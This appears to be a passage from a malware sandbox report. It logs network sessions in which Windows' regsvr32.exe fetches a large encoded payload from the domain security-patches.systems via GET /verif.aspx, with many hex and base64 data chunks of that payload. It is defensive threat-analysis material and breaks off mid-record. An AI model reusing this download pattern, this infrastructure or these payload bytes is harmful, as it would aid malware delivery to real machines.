35 76 41 45 0d 0a 30 4f 32 56 48 44 2f 6d 38 41 54 51 37 5a 4d 63 6c 65 62 77 42 41 55 65 6b 68 77 6b 35 76 41 45 42 52 36 56 48 43 48 6d 38 41 54 51 37 5a 49 63 49 75 62 77 42 41 55 65 6b Data Ascii: L2nBYVZKN3hmM1FhqrU3eNozUWFVSjd4IjNRYVVKN3hiM1FhVUo3eGIzUWFVSjd4YjNRYVVKN3hiM1FhXUs3eGws629V/j61Q4tQLZhrYxALQHERJyVQCgNecQI0JFkXFhMzBHU4QhZCWj9BEQVkWA9cNQR7RzpyRjNRYVVKN3hH/vhONObwBAOflh005vAE0O2VHD/m8ATQ7ZMclebwBAUekhwk5vAEBR6VHCHm8ATQ7ZIcIubwBAUek
2024-12-06 21:11:12 UTC	16384	IN	Data Raw: 2b 36 59 2f 32 69 79 70 6f 6c 46 35 59 54 50 61 4a 4b 6e 42 30 69 57 67 4e 31 47 74 6d 59 62 37 74 4b 37 2f 6e 61 32 5a 68 76 75 30 0d 0a 4e 37 69 39 34 72 6c 69 76 6a 57 65 41 4a 48 71 47 4c 61 2b 65 65 74 79 56 65 67 55 51 72 77 74 6e 76 51 54 5a 56 52 4b 4e 33 6a 70 64 71 32 6d 46 55 49 32 65 47 49 7a 32 69 79 70 6a 54 61 63 0d 0a 38 54 74 42 36 67 42 47 76 69 32 4b 75 42 52 70 33 41 2f 54 38 79 2f 50 30 71 42 5a 77 33 71 55 36 57 61 39 36 41 43 79 76 44 32 4b 75 68 53 42 33 67 66 54 38 53 2f 76 32 6a 53 31 77 54 58 78 0d 0a 4a 2b 76 61 4c 49 6e 42 4a 76 45 33 78 39 6f 6b 72 59 30 33 2f 42 51 37 51 65 6f 59 73 76 42 35 69 6b 56 5a 63 64 34 66 7a 2f 4d 6e 78 39 67 6a 55 63 6c 4b 6a 47 4a 47 57 4b 59 51 75 6a 64 34 0d 0a 59 6a 4f 36 61 4e 34 48 77 33 73 Data Ascii: +6Y/2iypolF5YTPaJKnB0iWgN1GtmYb7tK7/na2Zhvu0N7i94rlivjWeAJHqGLa+eetyVegUQrwtnvQTZVRKN3jpdq2mFUI2eGIz2iypjTac8TtB6gBGvi2KuBRp3A/T8y/P0qBZw3qU6Wa96ACyvD2KuhSB3gfT8S/v2jS1wTXxJ+vaLInBJvE3x9okrY03/BQ7QeoYsvB5ikVZcd4fz/Mnx9gjUclKjGJGWKYQujd4YjO6aN4Hw3s
2024-12-06 21:11:12 UTC	16384	IN	Data Raw: 36 51 43 30 4f 4d 34 6e 7a 64 53 68 49 52 48 77 50 62 6f 7a 55 57 46 56 77 58 70 6f 0d 0a 36 33 36 39 36 67 42 47 76 69 32 53 75 42 53 52 33 41 2f 37 38 79 2f 66 32 43 79 46 78 32 4b 30 36 32 61 78 70 68 43 65 4e 33 68 69 4d 39 6f 6b 64 63 4e 79 6e 4f 6c 2b 54 65 67 59 6f 72 77 74 0d 0a 69 72 6f 45 70 64 34 50 30 2f 45 6e 2b 39 77 73 6b 63 4e 36 70 4f 6c 6d 73 54 50 65 42 2b 75 51 52 67 35 51 59 62 78 64 79 49 65 64 75 42 52 70 33 67 63 72 38 7a 63 54 32 47 6e 63 47 6a 50 7a 0d 0a 4a 7a 76 61 68 41 69 4a 2b 37 53 75 2f 35 32 74 6d 59 62 37 74 44 65 34 76 54 79 57 68 76 75 30 72 76 2b 64 72 5a 6d 47 2b 37 51 33 75 4c 30 77 76 6b 4f 38 50 57 71 77 6b 58 48 63 44 7a 2f 7a 0d 0a 4c 7a 74 71 4c 46 6b 2b 41 50 4d 33 4f 39 67 30 71 63 46 36 68 49 6f 59 67 32 4e Data Ascii: 6QC0OM4nzdShIRHwPbozUWFVwXpo63696gBGvi2SuBSR3A/78y/f2CyFx2K062axphCeN3hiM9okdcNynOl+TegYorwtiroEpd4P0/En+9wskcN6pOlmsTPeB+uQRg5QYbxdyIeduBRp3gcr8zcT2GncGjPzJzvahAiJ+7Su/52tmYb7tDe4vTyWhvu0rv+drZmG+7Q3uL0wvkO8PWqwkXHcDz/zLztqLFk+APM3O9g0qcF6hIoYg2N
2024-12-06 21:11:12 UTC	16384	IN	Data Raw: 61 4f 75 6d 51 5a 36 71 74 62 37 39 0d 0a 64 73 79 75 6e 72 35 44 76 44 58 36 73 4c 68 67 33 41 65 76 2b 78 2b 72 55 52 64 4c 78 36 4a 6f 6e 63 79 75 36 4d 44 36 79 59 65 64 50 4f 63 6b 54 52 71 38 39 64 4c 4e 72 70 36 39 64 53 5a 35 0d 0a 59 74 69 43 36 74 68 61 79 49 65 64 75 4d 52 31 71 72 58 49 38 65 39 37 72 35 36 71 77 36 49 30 6e 4d 79 75 36 74 41 43 79 59 65 64 75 4e 77 74 71 37 58 49 38 53 63 2f 32 43 78 46 6a 58 4b 67 0d 0a 59 6a 4e 52 59 62 79 78 4e 33 68 69 76 73 52 42 71 37 58 49 38 54 65 6e 32 69 54 42 77 37 4a 41 6e 63 79 75 36 68 6a 65 74 41 46 32 50 43 64 74 6b 73 38 4c 68 35 33 4d 55 47 46 56 53 74 78 79 0d 0a 70 62 5a 74 6e 71 71 31 4e 33 68 69 4d 39 76 30 61 62 58 49 68 2b 70 6d 75 57 37 6a 44 39 2f 39 6f 6b 64 47 36 68 6a 65 76 47 6e Data Ascii: aOumQZ6qtb79dsyunr5DvDX6sLhg3Aev+x+rURdLx6Joncyu6MD6yYedPOckTRq89dLNrp69dSZ5YtiC6thayIeduMR1qrXI8e97r56qw6I0nMyu6tACyYeduNwtq7XI8Sc/2CxFjXKgYjNRYbyxN3hivsRBq7XI8Ten2iTBw7JAncyu6hjetAF2PCdtks8Lh53MUGFVStxypbZtnqq1N3hiM9v0abXIh+pmuW7jD9/9okdG6hjevGn
2024-12-06 21:11:12 UTC	16384	IN	Data Raw: 67 55 74 64 35 43 76 6a 4a 6d 39 42 53 64 56 55 6f 33 65 4f 6c 6d 57 65 67 41 68 72 77 39 7a 72 6f 55 73 64 34 48 35 2f 45 76 39 39 6f 30 6d 63 4e 69 6b 4f 6c 32 75 65 67 51 67 72 77 31 0d 0a 71 72 6f 63 30 64 67 66 78 53 72 70 64 72 6b 78 33 67 66 7a 6b 49 35 4f 72 70 34 2f 53 72 6f 31 79 6d 4b 35 6b 4e 32 31 79 50 75 6d 4f 31 37 58 68 63 2f 6c 44 58 56 62 52 31 31 56 53 6c 2b 49 0d 0a 46 44 74 42 43 65 33 47 50 32 69 4b 38 32 64 6e 56 63 6e 7a 64 4b 56 32 6b 57 46 56 53 6a 66 31 4c 35 2f 59 4c 4c 48 42 59 70 7a 70 4d 64 67 6b 36 63 46 36 6e 4f 6c 6d 6b 65 68 45 77 58 4c 45 0d 0a 36 33 62 70 36 68 6a 79 76 6a 58 57 39 42 53 64 71 72 58 49 68 2b 39 2b 2b 59 6d 64 6b 7a 64 34 36 58 62 6c 36 68 69 2b 55 2f 46 76 4d 31 46 68 56 63 48 53 4a 61 48 2f 6e 61 32 Data Ascii: gUtd5CvjJm9BSdVUo3eOlmWegAhrw9zroUsd4H5/Ev99o0mcNikOl2uegQgrw1qroc0dgfxSrpdrkx3gfzkI5Orp4/Sro1ymK5kN21yPumO17Xhc/lDXVbR11VSl+IFDtBCe3GP2iK82dnVcnzdKV2kWFVSjf1L5/YLLHBYpzpMdgk6cF6nOlmkehEwXLE63bp6hjyvjXW9BSdqrXIh+9++Ymdkzd46Xbl6hi+U/FvM1FhVcHSJaH/na2
2024-12-06 21:11:12 UTC	16384	IN	Data Raw: 58 49 68 2b 48 66 51 65 71 5a 77 35 4b 34 6e 4d 79 75 36 73 41 36 79 49 65 64 59 62 6b 34 4a 30 6f 33 38 79 66 44 32 6d 6d 39 4e 59 56 34 0d 0a 59 76 55 55 69 46 54 42 65 6f 6a 70 49 74 6a 30 50 62 58 49 68 2b 39 32 75 4f 6a 51 4a 73 69 48 6e 62 67 63 61 64 37 66 57 34 65 64 7a 4e 74 6a 33 55 75 36 39 51 72 4d 72 70 37 63 78 31 4f 48 0d 0a 6e 63 7a 61 4e 46 33 42 73 68 79 64 7a 4b 37 71 58 63 4e 39 66 4b 56 32 72 5a 36 71 74 63 6a 31 4c 2f 2b 35 73 42 4e 49 4e 33 66 55 5a 70 30 7a 32 41 66 6a 6b 43 61 34 55 32 48 65 44 7a 2b 52 0d 0a 69 44 64 52 59 64 34 50 78 2f 75 69 4e 39 6a 6b 4e 62 58 49 68 39 73 33 55 57 46 56 49 65 61 48 36 62 59 78 6e 71 71 31 4e 43 68 6d 75 73 51 39 71 72 58 49 38 2b 39 76 72 70 36 71 79 51 35 34 0d 0a 46 31 47 58 4a 4c 31 4b 38 Data Ascii: XIh+HfQeqZw5K4nMyu6sA6yIedYbk4J0o38yfD2mm9NYV4YvUUiFTBeojpItj0PbXIh+92uOjQJsiHnbgcad7fW4edzNtj3Uu69QrMrp7cx1OHnczaNF3BshydzK7qXcN9fKV2rZ6qtcj1L/+5sBNIN3fUZp0z2AfjkCa4U2HeDz+RiDdRYd4Px/uiN9jkNbXIh9s3UWFVIeaH6bYxnqq1NChmusQ9qrXI8+9vrp6qyQ54F1GXJL1K8
2024-12-06 21:11:13 UTC	16384	IN	Data Raw: 67 63 69 64 61 4c 50 35 42 75 58 56 46 68 33 67 66 66 6b 4d 59 72 55 32 48 65 42 38 76 7a 0d 0a 61 39 75 72 34 6c 56 4b 76 43 32 65 75 46 4f 49 4d 55 67 33 65 4f 6c 32 72 65 4b 56 54 72 34 39 70 6f 70 56 59 56 56 4b 58 4b 6d 64 75 42 53 6c 56 68 6f 7a 38 54 66 7a 32 69 79 56 77 53 62 78 0d 0a 4e 34 2f 61 4a 4f 6e 4b 44 33 6f 58 4f 70 59 6b 6a 55 73 33 65 47 4c 59 56 71 59 51 6b 6a 64 34 59 6a 50 62 4c 49 33 43 65 6f 70 74 68 51 53 54 30 4a 68 43 4a 2b 6c 32 72 65 4b 56 54 72 34 39 0d 0a 32 6f 70 56 59 56 56 4b 58 4b 6d 64 75 42 54 5a 56 68 6f 7a 38 54 65 48 32 69 7a 68 77 53 62 78 4e 34 50 61 4a 4f 58 4b 44 33 6b 58 4f 70 59 6b 67 55 73 33 65 47 4c 59 56 71 59 51 6e 6a 64 34 0d 0a 59 6a 50 62 4c 49 48 43 65 6f 6c 74 68 51 53 51 30 4a 68 43 62 77 6f 79 51 Data Ascii: gcidaLP5BuXVFh3gffkMYrU2HeB8vza9ur4lVKvC2euFOIMUg3eOl2reKVTr49popVYVVKXKmduBSlVhoz8Tfz2iyVwSbxN4/aJOnKD3oXOpYkjUs3eGLYVqYQkjd4YjPbLI3CeopthQST0JhCJ+l2reKVTr492opVYVVKXKmduBTZVhoz8TeH2izhwSbxN4PaJOXKD3kXOpYkgUs3eGLYVqYQnjd4YjPbLIHCeolthQSQ0JhCbwoyQ
2024-12-06 21:11:13 UTC	16384	IN	Data Raw: 2f 77 50 66 71 33 31 57 6c 46 77 58 4c 67 0d 0a 34 66 4e 51 36 4e 41 6d 79 59 65 64 75 42 7a 35 33 31 75 2f 4c 64 2b 77 46 50 6c 55 79 6b 72 46 59 6b 61 2f 36 68 44 53 48 50 30 4f 7a 61 36 65 33 4d 39 66 68 70 33 4d 32 75 77 39 74 4d 69 48 0d 0a 36 37 34 31 6e 36 71 31 76 4f 30 47 7a 61 36 65 33 4e 39 58 68 70 33 4d 32 75 51 31 74 4d 69 48 4d 6c 76 56 35 56 31 61 75 76 56 4b 7a 36 36 65 76 57 30 38 68 35 33 31 46 4a 31 44 78 37 70 51 0d 0a 6e 73 79 75 4d 44 39 61 75 75 33 69 79 61 36 65 42 38 46 36 69 49 72 34 64 57 4a 56 77 37 49 6b 6e 4d 79 75 36 74 41 57 79 59 65 64 75 74 51 35 71 37 58 49 76 69 66 50 52 75 6f 59 75 72 53 35 0d 0a 49 72 68 41 36 4d 41 65 79 6f 65 64 75 42 42 6c 33 4d 39 76 68 5a 33 4d 32 69 68 64 77 37 6f 6b 6e 38 79 75 37 4d 41 65 79 Data Ascii: /wPfq31WlFwXLg4fNQ6NAmyYeduBz531u/Ld+wFPlUykrFYka/6hDSHP0Oza6e3M9fhp3M2uw9tMiH6741n6q1vO0Gza6e3N9Xhp3M2uQ1tMiHMlvV5V1auvVKz66evW08h531FJ1Dx7pQnsyuMD9auu3iya6eB8F6iIr4dWJVw7IknMyu6tAWyYedutQ5q7XIvifPRuoYurS5IrhA6MAeyoeduBBl3M9vhZ3M2ihdw7okn8yu7MAey
2024-12-06 21:11:13 UTC	16384	IN	Data Raw: 62 57 53 52 6b 31 70 62 64 53 43 4b 67 43 64 69 56 63 46 36 68 4f 70 79 4d 65 6f 51 74 72 79 64 50 2f 46 56 59 5a 6d 47 2b 37 51 33 75 4c 33 69 75 57 61 2b 4e 5a 36 34 46 47 6e 63 44 38 50 7a 0d 0a 4c 38 66 59 4c 49 48 42 59 6f 54 72 5a 71 48 71 45 4c 71 2b 50 5a 71 34 48 4a 6d 53 53 7a 64 34 59 6a 50 61 4e 4b 32 4e 64 58 78 69 4d 31 46 68 33 67 38 2f 38 32 71 36 48 49 33 65 48 39 76 78 0d 0a 4e 39 76 63 4a 4c 33 44 63 71 54 70 66 6c 6e 71 52 4d 45 31 38 53 66 58 32 69 79 78 77 33 71 59 37 32 61 78 36 41 43 53 76 44 32 2b 75 46 6b 77 33 68 2f 76 38 32 42 6a 32 69 79 70 6f 68 6d 62 0d 0a 6e 4d 7a 61 4a 4b 6e 42 30 69 57 67 4e 31 47 74 6d 59 62 37 74 44 65 34 76 65 4b 35 58 72 34 31 6e 72 67 55 6e 64 77 50 77 2f 4d 76 78 39 67 73 72 63 46 69 67 4b 55 78 55 Data Ascii: bWSRk1pbdSCKgCdiVcF6hOpyMeoQtrydP/FVYZmG+7Q3uL3iuWa+NZ64FGncD8PzL8fYLIHBYoTrZqHqELq+PZq4HJmSSzd4YjPaNK2NdXxiM1Fh3g8/82q6HI3eH9vxN9vcJL3DcqTpflnqRME18SfX2iyxw3qY72ax6ACSvD2+uFkw3h/v82Bj2iypohmbnMzaJKnB0iWgN1GtmYb7tDe4veK5Xr41nrgUndwPw/Mvx9gsrcFigKUxU
2024-12-06 21:11:13 UTC	16384	IN	Data Raw: 58 49 31 79 76 47 4d 7a 55 57 47 2b 54 66 41 39 70 6a 4e 52 59 56 58 41 63 72 79 4c 47 46 42 68 56 61 4d 54 65 57 49 7a 30 52 79 6d 54 45 49 35 0d 0a 34 6b 36 6a 5a 69 42 78 76 44 56 71 75 42 42 70 33 68 73 37 38 36 72 62 6d 77 5a 52 53 72 77 31 62 6c 56 65 54 78 52 43 71 49 36 6d 64 79 74 6f 6b 67 2f 33 65 57 49 7a 55 59 70 53 6a 58 4b 34 0d 0a 59 6a 4e 52 59 64 38 50 39 35 47 47 4d 31 46 68 76 4a 63 33 65 47 4b 7a 4c 4a 4a 53 50 33 54 34 48 38 46 58 46 47 6a 42 59 6e 54 70 65 56 6e 71 42 30 62 66 2f 51 55 33 55 65 6f 51 51 73 56 33 0d 0a 63 6e 74 5a 42 31 70 6b 2f 2b 65 55 39 78 55 62 58 49 31 79 78 47 4d 7a 55 57 47 2b 54 66 41 39 33 6a 4e 52 59 56 58 41 63 73 53 4c 71 46 46 68 56 61 4f 6a 65 47 49 7a 30 52 79 6d 54 45 49 39 0d 0a 34 6b 36 6a 5a 43 42 Data Ascii: XI1yvGMzUWG+TfA9pjNRYVXAcryLGFBhVaMTeWIz0RymTEI54k6jZiBxvDVquBBp3hs786rbmwZRSrw1blVeTxRCqI6mdytokg/3eWIzUYpSjXK4YjNRYd8P95GGM1FhvJc3eGKzLJJSP3T4H8FXFGjBYnTpeVnqB0bf/QU3UeoQQsV3cntZB1pk/+eU9xUbXI1yxGMzUWG+TfA93jNRYVXAcsSLqFFhVaOjeGIz0RymTEI94k6jZCB

Session ID	Source IP	Source Port	Destination IP	Destination Port	PID	Process
3	192.168.2.4	49778	185.234.216.175	443	1272	C:\Windows\SysWOW64\regsvr32.exe

Timestamp	Bytes transferred	Direction	Data
2024-12-06 21:12:08 UTC	117	OUT	GET /verif.aspx HTTP/1.1 User-Agent: Microsoft-WNS/11.0 Host: security-patches.systems Cache-Control: no-cache
2024-12-06 21:12:09 UTC	252	IN	HTTP/1.1 200 OK Date: Fri, 06 Dec 2024 21:12:09 GMT Server: Apache/2.4.58 (Win64) OpenSSL/3.1.3 PHP/8.2.12 Last-Modified: Sat, 23 Nov 2024 15:29:11 GMT ETag: "d75c4-62796294faafa" Accept-Ranges: bytes Content-Length: 882116 Connection: close
2024-12-06 21:12:09 UTC	7940	IN	Data Raw: 4c 32 6e 42 59 56 5a 4b 4e 33 68 6d 4d 31 46 68 71 72 55 33 65 4e 6f 7a 55 57 46 56 53 6a 64 34 49 6a 4e 52 59 56 56 4b 4e 33 68 69 4d 31 46 68 56 55 6f 33 65 47 49 7a 55 57 46 56 53 6a 64 34 0d 0a 59 6a 4e 52 59 56 56 4b 4e 33 68 69 4d 31 46 68 58 55 73 33 65 47 77 73 36 32 39 56 2f 6a 36 31 51 34 74 51 4c 5a 68 72 59 78 41 4c 51 48 45 52 4a 79 56 51 43 67 4e 65 63 51 49 30 4a 46 6b 58 0d 0a 46 68 4d 7a 42 48 55 34 51 68 5a 43 57 6a 39 42 45 51 56 6b 57 41 39 63 4e 51 52 37 52 7a 70 79 52 6a 4e 52 59 56 56 4b 4e 33 68 48 2f 76 68 4f 4e 4f 62 77 42 41 4f 66 6c 68 30 30 35 76 41 45 0d 0a 30 4f 32 56 48 44 2f 6d 38 41 54 51 37 5a 4d 63 6c 65 62 77 42 41 55 65 6b 68 77 6b 35 76 41 45 42 52 36 56 48 43 48 6d 38 41 54 51 37 5a 49 63 49 75 62 77 42 41 55 65 6b Data Ascii: L2nBYVZKN3hmM1FhqrU3eNozUWFVSjd4IjNRYVVKN3hiM1FhVUo3eGIzUWFVSjd4YjNRYVVKN3hiM1FhXUs3eGws629V/j61Q4tQLZhrYxALQHERJyVQCgNecQI0JFkXFhMzBHU4QhZCWj9BEQVkWA9cNQR7RzpyRjNRYVVKN3hH/vhONObwBAOflh005vAE0O2VHD/m8ATQ7ZMclebwBAUekhwk5vAEBR6VHCHm8ATQ7ZIcIubwBAUek
2024-12-06 21:12:09 UTC	16384	IN	Data Raw: 2b 36 59 2f 32 69 79 70 6f 6c 46 35 59 54 50 61 4a 4b 6e 42 30 69 57 67 4e 31 47 74 6d 59 62 37 74 4b 37 2f 6e 61 32 5a 68 76 75 30 0d 0a 4e 37 69 39 34 72 6c 69 76 6a 57 65 41 4a 48 71 47 4c 61 2b 65 65 74 79 56 65 67 55 51 72 77 74 6e 76 51 54 5a 56 52 4b 4e 33 6a 70 64 71 32 6d 46 55 49 32 65 47 49 7a 32 69 79 70 6a 54 61 63 0d 0a 38 54 74 42 36 67 42 47 76 69 32 4b 75 42 52 70 33 41 2f 54 38 79 2f 50 30 71 42 5a 77 33 71 55 36 57 61 39 36 41 43 79 76 44 32 4b 75 68 53 42 33 67 66 54 38 53 2f 76 32 6a 53 31 77 54 58 78 0d 0a 4a 2b 76 61 4c 49 6e 42 4a 76 45 33 78 39 6f 6b 72 59 30 33 2f 42 51 37 51 65 6f 59 73 76 42 35 69 6b 56 5a 63 64 34 66 7a 2f 4d 6e 78 39 67 6a 55 63 6c 4b 6a 47 4a 47 57 4b 59 51 75 6a 64 34 0d 0a 59 6a 4f 36 61 4e 34 48 77 33 73 Data Ascii: +6Y/2iypolF5YTPaJKnB0iWgN1GtmYb7tK7/na2Zhvu0N7i94rlivjWeAJHqGLa+eetyVegUQrwtnvQTZVRKN3jpdq2mFUI2eGIz2iypjTac8TtB6gBGvi2KuBRp3A/T8y/P0qBZw3qU6Wa96ACyvD2KuhSB3gfT8S/v2jS1wTXxJ+vaLInBJvE3x9okrY03/BQ7QeoYsvB5ikVZcd4fz/Mnx9gjUclKjGJGWKYQujd4YjO6aN4Hw3s
2024-12-06 21:12:09 UTC	16384	IN	Data Raw: 36 51 43 30 4f 4d 34 6e 7a 64 53 68 49 52 48 77 50 62 6f 7a 55 57 46 56 77 58 70 6f 0d 0a 36 33 36 39 36 67 42 47 76 69 32 53 75 42 53 52 33 41 2f 37 38 79 2f 66 32 43 79 46 78 32 4b 30 36 32 61 78 70 68 43 65 4e 33 68 69 4d 39 6f 6b 64 63 4e 79 6e 4f 6c 2b 54 65 67 59 6f 72 77 74 0d 0a 69 72 6f 45 70 64 34 50 30 2f 45 6e 2b 39 77 73 6b 63 4e 36 70 4f 6c 6d 73 54 50 65 42 2b 75 51 52 67 35 51 59 62 78 64 79 49 65 64 75 42 52 70 33 67 63 72 38 7a 63 54 32 47 6e 63 47 6a 50 7a 0d 0a 4a 7a 76 61 68 41 69 4a 2b 37 53 75 2f 35 32 74 6d 59 62 37 74 44 65 34 76 54 79 57 68 76 75 30 72 76 2b 64 72 5a 6d 47 2b 37 51 33 75 4c 30 77 76 6b 4f 38 50 57 71 77 6b 58 48 63 44 7a 2f 7a 0d 0a 4c 7a 74 71 4c 46 6b 2b 41 50 4d 33 4f 39 67 30 71 63 46 36 68 49 6f 59 67 32 4e Data Ascii: 6QC0OM4nzdShIRHwPbozUWFVwXpo63696gBGvi2SuBSR3A/78y/f2CyFx2K062axphCeN3hiM9okdcNynOl+TegYorwtiroEpd4P0/En+9wskcN6pOlmsTPeB+uQRg5QYbxdyIeduBRp3gcr8zcT2GncGjPzJzvahAiJ+7Su/52tmYb7tDe4vTyWhvu0rv+drZmG+7Q3uL0wvkO8PWqwkXHcDz/zLztqLFk+APM3O9g0qcF6hIoYg2N
2024-12-06 21:12:09 UTC	16384	IN	Data Raw: 61 4f 75 6d 51 5a 36 71 74 62 37 39 0d 0a 64 73 79 75 6e 72 35 44 76 44 58 36 73 4c 68 67 33 41 65 76 2b 78 2b 72 55 52 64 4c 78 36 4a 6f 6e 63 79 75 36 4d 44 36 79 59 65 64 50 4f 63 6b 54 52 71 38 39 64 4c 4e 72 70 36 39 64 53 5a 35 0d 0a 59 74 69 43 36 74 68 61 79 49 65 64 75 4d 52 31 71 72 58 49 38 65 39 37 72 35 36 71 77 36 49 30 6e 4d 79 75 36 74 41 43 79 59 65 64 75 4e 77 74 71 37 58 49 38 53 63 2f 32 43 78 46 6a 58 4b 67 0d 0a 59 6a 4e 52 59 62 79 78 4e 33 68 69 76 73 52 42 71 37 58 49 38 54 65 6e 32 69 54 42 77 37 4a 41 6e 63 79 75 36 68 6a 65 74 41 46 32 50 43 64 74 6b 73 38 4c 68 35 33 4d 55 47 46 56 53 74 78 79 0d 0a 70 62 5a 74 6e 71 71 31 4e 33 68 69 4d 39 76 30 61 62 58 49 68 2b 70 6d 75 57 37 6a 44 39 2f 39 6f 6b 64 47 36 68 6a 65 76 47 6e Data Ascii: aOumQZ6qtb79dsyunr5DvDX6sLhg3Aev+x+rURdLx6Joncyu6MD6yYedPOckTRq89dLNrp69dSZ5YtiC6thayIeduMR1qrXI8e97r56qw6I0nMyu6tACyYeduNwtq7XI8Sc/2CxFjXKgYjNRYbyxN3hivsRBq7XI8Ten2iTBw7JAncyu6hjetAF2PCdtks8Lh53MUGFVStxypbZtnqq1N3hiM9v0abXIh+pmuW7jD9/9okdG6hjevGn
2024-12-06 21:12:09 UTC	16384	IN	Data Raw: 67 55 74 64 35 43 76 6a 4a 6d 39 42 53 64 56 55 6f 33 65 4f 6c 6d 57 65 67 41 68 72 77 39 7a 72 6f 55 73 64 34 48 35 2f 45 76 39 39 6f 30 6d 63 4e 69 6b 4f 6c 32 75 65 67 51 67 72 77 31 0d 0a 71 72 6f 63 30 64 67 66 78 53 72 70 64 72 6b 78 33 67 66 7a 6b 49 35 4f 72 70 34 2f 53 72 6f 31 79 6d 4b 35 6b 4e 32 31 79 50 75 6d 4f 31 37 58 68 63 2f 6c 44 58 56 62 52 31 31 56 53 6c 2b 49 0d 0a 46 44 74 42 43 65 33 47 50 32 69 4b 38 32 64 6e 56 63 6e 7a 64 4b 56 32 6b 57 46 56 53 6a 66 31 4c 35 2f 59 4c 4c 48 42 59 70 7a 70 4d 64 67 6b 36 63 46 36 6e 4f 6c 6d 6b 65 68 45 77 58 4c 45 0d 0a 36 33 62 70 36 68 6a 79 76 6a 58 57 39 42 53 64 71 72 58 49 68 2b 39 2b 2b 59 6d 64 6b 7a 64 34 36 58 62 6c 36 68 69 2b 55 2f 46 76 4d 31 46 68 56 63 48 53 4a 61 48 2f 6e 61 32 Data Ascii: gUtd5CvjJm9BSdVUo3eOlmWegAhrw9zroUsd4H5/Ev99o0mcNikOl2uegQgrw1qroc0dgfxSrpdrkx3gfzkI5Orp4/Sro1ymK5kN21yPumO17Xhc/lDXVbR11VSl+IFDtBCe3GP2iK82dnVcnzdKV2kWFVSjf1L5/YLLHBYpzpMdgk6cF6nOlmkehEwXLE63bp6hjyvjXW9BSdqrXIh+9++Ymdkzd46Xbl6hi+U/FvM1FhVcHSJaH/na2
2024-12-06 21:12:09 UTC	16384	IN	Data Raw: 58 49 68 2b 48 66 51 65 71 5a 77 35 4b 34 6e 4d 79 75 36 73 41 36 79 49 65 64 59 62 6b 34 4a 30 6f 33 38 79 66 44 32 6d 6d 39 4e 59 56 34 0d 0a 59 76 55 55 69 46 54 42 65 6f 6a 70 49 74 6a 30 50 62 58 49 68 2b 39 32 75 4f 6a 51 4a 73 69 48 6e 62 67 63 61 64 37 66 57 34 65 64 7a 4e 74 6a 33 55 75 36 39 51 72 4d 72 70 37 63 78 31 4f 48 0d 0a 6e 63 7a 61 4e 46 33 42 73 68 79 64 7a 4b 37 71 58 63 4e 39 66 4b 56 32 72 5a 36 71 74 63 6a 31 4c 2f 2b 35 73 42 4e 49 4e 33 66 55 5a 70 30 7a 32 41 66 6a 6b 43 61 34 55 32 48 65 44 7a 2b 52 0d 0a 69 44 64 52 59 64 34 50 78 2f 75 69 4e 39 6a 6b 4e 62 58 49 68 39 73 33 55 57 46 56 49 65 61 48 36 62 59 78 6e 71 71 31 4e 43 68 6d 75 73 51 39 71 72 58 49 38 2b 39 76 72 70 36 71 79 51 35 34 0d 0a 46 31 47 58 4a 4c 31 4b 38 Data Ascii: XIh+HfQeqZw5K4nMyu6sA6yIedYbk4J0o38yfD2mm9NYV4YvUUiFTBeojpItj0PbXIh+92uOjQJsiHnbgcad7fW4edzNtj3Uu69QrMrp7cx1OHnczaNF3BshydzK7qXcN9fKV2rZ6qtcj1L/+5sBNIN3fUZp0z2AfjkCa4U2HeDz+RiDdRYd4Px/uiN9jkNbXIh9s3UWFVIeaH6bYxnqq1NChmusQ9qrXI8+9vrp6qyQ54F1GXJL1K8
2024-12-06 21:12:09 UTC	16384	IN	Data Raw: 67 63 69 64 61 4c 50 35 42 75 58 56 46 68 33 67 66 66 6b 4d 59 72 55 32 48 65 42 38 76 7a 0d 0a 61 39 75 72 34 6c 56 4b 76 43 32 65 75 46 4f 49 4d 55 67 33 65 4f 6c 32 72 65 4b 56 54 72 34 39 70 6f 70 56 59 56 56 4b 58 4b 6d 64 75 42 53 6c 56 68 6f 7a 38 54 66 7a 32 69 79 56 77 53 62 78 0d 0a 4e 34 2f 61 4a 4f 6e 4b 44 33 6f 58 4f 70 59 6b 6a 55 73 33 65 47 4c 59 56 71 59 51 6b 6a 64 34 59 6a 50 62 4c 49 33 43 65 6f 70 74 68 51 53 54 30 4a 68 43 4a 2b 6c 32 72 65 4b 56 54 72 34 39 0d 0a 32 6f 70 56 59 56 56 4b 58 4b 6d 64 75 42 54 5a 56 68 6f 7a 38 54 65 48 32 69 7a 68 77 53 62 78 4e 34 50 61 4a 4f 58 4b 44 33 6b 58 4f 70 59 6b 67 55 73 33 65 47 4c 59 56 71 59 51 6e 6a 64 34 0d 0a 59 6a 50 62 4c 49 48 43 65 6f 6c 74 68 51 53 51 30 4a 68 43 62 77 6f 79 51 Data Ascii: gcidaLP5BuXVFh3gffkMYrU2HeB8vza9ur4lVKvC2euFOIMUg3eOl2reKVTr49popVYVVKXKmduBSlVhoz8Tfz2iyVwSbxN4/aJOnKD3oXOpYkjUs3eGLYVqYQkjd4YjPbLI3CeopthQST0JhCJ+l2reKVTr492opVYVVKXKmduBTZVhoz8TeH2izhwSbxN4PaJOXKD3kXOpYkgUs3eGLYVqYQnjd4YjPbLIHCeolthQSQ0JhCbwoyQ
2024-12-06 21:12:09 UTC	16384	IN	Data Raw: 2f 77 50 66 71 33 31 57 6c 46 77 58 4c 67 0d 0a 34 66 4e 51 36 4e 41 6d 79 59 65 64 75 42 7a 35 33 31 75 2f 4c 64 2b 77 46 50 6c 55 79 6b 72 46 59 6b 61 2f 36 68 44 53 48 50 30 4f 7a 61 36 65 33 4d 39 66 68 70 33 4d 32 75 77 39 74 4d 69 48 0d 0a 36 37 34 31 6e 36 71 31 76 4f 30 47 7a 61 36 65 33 4e 39 58 68 70 33 4d 32 75 51 31 74 4d 69 48 4d 6c 76 56 35 56 31 61 75 76 56 4b 7a 36 36 65 76 57 30 38 68 35 33 31 46 4a 31 44 78 37 70 51 0d 0a 6e 73 79 75 4d 44 39 61 75 75 33 69 79 61 36 65 42 38 46 36 69 49 72 34 64 57 4a 56 77 37 49 6b 6e 4d 79 75 36 74 41 57 79 59 65 64 75 74 51 35 71 37 58 49 76 69 66 50 52 75 6f 59 75 72 53 35 0d 0a 49 72 68 41 36 4d 41 65 79 6f 65 64 75 42 42 6c 33 4d 39 76 68 5a 33 4d 32 69 68 64 77 37 6f 6b 6e 38 79 75 37 4d 41 65 79 Data Ascii: 